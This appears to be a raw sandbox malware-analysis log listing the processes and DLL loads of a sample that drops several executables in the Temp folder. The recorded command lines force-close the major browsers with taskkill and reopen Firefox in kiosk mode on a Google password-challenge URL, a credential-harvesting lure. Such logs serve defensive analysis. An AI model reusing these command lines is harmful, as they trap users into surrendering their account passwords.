Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2196 -prefMapHandle 2184 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c1d5462-c346-494a-a215-38ac926e40ed} 5900 "\\.\pipe\gecko-crash-server-pipe.5900" 2ee4c96f510 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3744 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3644 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e609914-25f3-44db-b997-bef2d2c17579} 5900 "\\.\pipe\gecko-crash-server-pipe.5900" 2ee5ee46610 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe "C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe "C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000995001\num.exe "C:\Users\user\AppData\Local\Temp\1000995001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2264 -prefsLen 25307 -prefMapSize 239752 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7c1ee17-f254-4518-bacd-57c97958ed1d} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" 1c6f5e6ff10 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe "C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe "C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe "C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe"
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe "C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe "C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe "C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000995001\num.exe "C:\Users\user\AppData\Local\Temp\1000995001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2196 -prefMapHandle 2184 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c1d5462-c346-494a-a215-38ac926e40ed} 5900 "\\.\pipe\gecko-crash-server-pipe.5900" 2ee4c96f510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3744 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3644 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e609914-25f3-44db-b997-bef2d2c17579} 5900 "\\.\pipe\gecko-crash-server-pipe.5900" 2ee5ee46610 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2264 -prefsLen 25307 -prefMapSize 239752 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7c1ee17-f254-4518-bacd-57c97958ed1d} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" 1c6f5e6ff10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winhttp.dll
